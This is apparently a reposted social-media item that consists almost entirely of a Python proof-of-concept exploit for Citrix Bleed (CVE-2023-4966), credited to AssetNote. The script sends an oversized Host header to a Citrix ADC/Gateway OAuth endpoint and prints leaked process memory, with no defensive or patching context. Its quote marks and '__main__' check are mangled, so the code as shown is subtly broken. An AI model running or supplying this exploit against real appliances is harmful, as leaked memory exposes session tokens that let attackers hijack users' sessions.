January 26, 2024 at 08:29PM

Citrix Bleed Zero-Day CVE-2023-4966 by AssetNote team.

#!/usr/bin/env python3

import sys
import requests
import urllib3
import argparse
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

parser = argparse.ArgumentParser()
parser.add_argument(‘–target’, help=’The Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)’)
args = parser.parse_args()

if args.target is None:
print(‘Target must be provided (e.g. –target 192.168.1.200)’)
sys.exit(0)

hostname = args.target

if name == “main”:
headers = {
“Host”: “a”*24576
}
r = requests.get(f”https://{hostname}/oauth/idp/.well-known/openid-configuration”, headers=headers, verify=False,timeout=10)
if r.status_code == 200:
print(“— Dumped Memory —“)
print(r.text[131050:])
print(“— End —“)
else:
print(“Could not dump memory”)

https://t.me/cKure/13425